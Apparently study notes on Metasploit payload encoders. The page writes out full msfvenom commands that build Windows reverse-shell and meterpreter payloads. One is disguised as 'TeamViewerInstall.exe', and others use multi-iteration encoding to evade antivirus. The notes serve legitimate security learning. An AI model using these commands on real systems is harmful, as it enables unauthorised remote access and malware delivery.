🔧 Encoders?

Encoders are used to modify payloads to:

Make them compatible with different processor architectures (x64, x86, sparc, ppc, mips).
Remove bad characters (e.g., \x00).
(Previously) evade antivirus detection.

🌐 AV Evasion History

Shikata Ga Nai (SGN): Famous XOR-based polymorphic encoder. Name means "It cannot be helped."
- Previously dominant for avoiding AV detection.
- Modern AV tools now detect SGN easily.
AV evasion through encoders is now limited due to signature detection improvements.

🔧 Legacy Tooling

Pre-2015: Used msfpayload and msfencode

msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai

🚀 Modern Tool: msfvenom

Combines msfpayload and msfencode
Example without encoder:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

Example with encoder:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

🤖 Encoder Selection in Metasploit

msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > show encoders

Output:

0  generic/eicar
1  generic/none
2  x64/xor
3  x64/xor_dynamic
4  x64/zutto_dekiru

⚖️ Architecture-Based Filtering

Available encoders depend on the selected payload/module architecture.
Example (MS09-050): More x86-compatible encoders are listed (e.g., x86/shikata_ga_nai, x86/alpha_upper).

📈 Real-World Encoding Impact

Encoding payloads once with SGN is no longer enough for AV evasion.
Example: Generating EXE payload with one SGN iteration:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o TeamViewerInstall.exe

VirusTotal: 54/69 detections ❌

🔄 Multi-Iteration Encoding

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -i 10 -f exe -o TeamViewerInstall.exe

Final payload size: ~611 bytes
VirusTotal: 52/65 detections ❌

🌐 VirusTotal API Integration

msf-virustotal -k <API_KEY> -f TeamViewerInstall.exe

Requires API key from VirusTotal
Useful for quick AV check of generated payloads

📆 Summary

Feature

Description

Purpose

Make payloads compatible & optionally evade AV

Legacy Tools

msfpayload + msfencode (pre-2015)

Modern Tool

msfvenom (combined tool)

Common Encoder

x86/shikata_ga_nai (Polymorphic XOR)

Effectiveness

Limited AV evasion nowadays

Extra

Use -i for multiple iterations to slightly improve AV evasion

Next step: Explore Encoders + Obfuscation + Payload Customization for deeper evasion tactics.

Previous🧠 Payloads Next🗄️ Database

Last updated 10 months ago

hashtag🌐 AV Evasion History

hashtag🔧 Legacy Tooling

hashtag🚀 Modern Tool: msfvenom

hashtag🤖 Encoder Selection in Metasploit

hashtag⚖️ Architecture-Based Filtering

hashtag📈 Real-World Encoding Impact

hashtag🔄 Multi-Iteration Encoding

hashtag🌐 VirusTotal API Integration

hashtag📆 Summary